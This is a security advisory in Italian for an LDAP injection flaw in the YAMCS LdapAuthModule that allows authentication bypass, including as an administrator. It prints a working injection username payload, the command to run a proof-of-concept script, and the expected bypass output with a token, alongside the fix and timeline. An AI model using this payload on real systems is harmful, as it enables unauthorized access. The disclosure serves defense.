
Esiste una vulnerabilità di iniezione LDAP in org.yamcs.security.LdapAuthModule. Il parametro username viene inserito direttamente nei filtri di ricerca LDAP senza escape RFC 4515, consentendo il bypass dell'autenticazione.
Esiste una vulnerabilità di iniezione LDAP in org.yamcs.security.LdapAuthModule. Il parametro username viene inserito direttamente nei filtri di ricerca LDAP senza escaping RFC 4515, consentendo il bypass dell'autenticazione.
| Campo | Valore |
|---|
| CVE | CVE-2026-42568 |
| Gravità | MEDIUM |
| CWE | CWE-90: Neutralizzazione impropria di elementi speciali in una query LDAP |
| Versioni interessate | yamcs-core < 5.12.7 (con autenticazione LDAP configurata) |
| Corretta in | yamcs-core 5.12.7 |
| Avviso | GHSA-cqh3-jg8p-336j |
Causa principale (LdapAuthModule.java):
var filter = userFilter.replace("{0}", username);
// username inserted directly — no RFC 4515 escaping
Con un userFilter tipico di (uid={0}), uno username malevolo rompe la struttura del filtro:
Input: *)(uid=*))(|(uid=*
Filter: (uid=*)(uid=*))(|(uid=*)
Result: Universal match — authentication bypassed
pip install requests
python3 poc.py http://localhost:8090
Output atteso su un'istanza vulnerabile (con LDAP configurato):
[1] Universal bypass (any account)
Username: *)(uid=*))(|(uid=*
Password: anything
Result: HTTP 200
[!!!] AUTHENTICATION BYPASSED
[!!!] Token received: eyJhbGciOiJSUzI1NiJ9...
Nota: questa vulnerabilità interessa solo le istanze YAMCS con
LdapAuthModuleconfigurato. Le installazioni predefinite che usano l'autenticazione integrata non sono interessate.
Un attaccante non autenticato in grado di raggiungere il server YAMCS può bypassare completamente l'autenticazione quando è configurata l'autenticazione LDAP, ottenendo l'accesso come un utente arbitrario, inclusi gli amministratori.
Aggiornare a yamcs-core >= 5.12.7.
La correzione applica l'escaping RFC 4515 allo username prima di costruire il filtro LDAP.
| Data | Evento |
|---|---|
| 2026-05 | Vulnerabilità segnalata |
| 2026-05-26 | Correzione rilasciata in yamcs-core 5.12.7 |
| 2026-05-26 | Avviso pubblico pubblicato |
Daniel Miranda Barcelona (Excal1bur)